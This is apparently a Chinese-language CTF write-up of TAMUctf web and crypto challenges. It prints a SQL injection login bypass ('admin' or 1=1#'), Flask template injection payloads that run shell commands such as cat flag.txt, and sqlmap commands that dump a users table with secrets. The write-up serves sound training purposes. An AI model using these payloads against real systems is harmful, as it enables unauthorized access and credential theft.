WEB
Not Another SQLi Challenge
最简单的sql注入题,万能密码就能拿到flag了
1 |
admin' or 1=1# |
Robots Rule
他要求是谷歌的robot访问,抓包改一下
Many Gig’ems to you!
这道题很脑洞,index.html、cookies.html和cook.js里面藏有flag
所以flag就是gigem{flag_in_source_and_cookies}
Science!
这道题提示了是用Flask写的,所以尝试一下flask模板注入49
确实是能回显49
的,接下来就是看有什么可以用了
看到有个os类
然后就是看有什么文件
1 |
{{url_for.__globals__.os.popen('ls ').read()}} |
最后读flag
1 |
{{url_for.__globals__.os.popen('cat flag.txt').read()}} |
这里有个坑就是这道题用火狐打开浏览器居然崩溃,摇头.gif
Buckets
这道题对于国内且英文不好的选手有点不友好,毕竟不知道s3 bucket
是什么,谷歌一波发现是一个云存储的东西吧,知道一个站点的名字就可以看见存储的东西
然后访问一下http://tamuctf.s3.amazonaws.com/
看见
访问一下就能看到flag了
login app
这道题源码可以看到这一段
然后可以知道是mongodb注入
最后getflaggigem{n0_sql?_n0_pr0bl3m_8a8651c31f16f5dea}
Bird Box Challenge
很简单的sql注入,一开始我还以为是ssrf搞了半天……….
1337 Secur1ty
查看cookie可以看见有个secret,猜测secret是一个表明身份的序号,接下来就是想办法拿到admin的secret值
message页面有个id值,直接修改会显示不同的信件,尝试一下sql注入
1 |
sqlmap -u http://web6.tamuctf.com/message?id=2 -dbs |
1 |
sqlmap -u http://web6.tamuctf.com/message?id=2 -D 1337_Secur1ty --tables |
1 |
sqlmap -u http://web6.tamuctf.com/message?id=2 -D 1337_Secur1ty -T Users --columns |
1 |
sqlmap -u http://web6.tamuctf.com/message?id=2 -D 1337_Secur1ty -T Users -C UserID,FirstName,LastName,Secret --dump |
截止就是伪造身份登录了
最后getflaggigem{th3_T0tp_1s_we4k_w1tH_yoU}
crypto
RSAaaay
题目
1 |
Hey, you're a hacker, right? I think I am too, look at what I made! |
分解下n然后脚本一把梭
1 |
import libnum |
FROM:Xi4or0uji
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论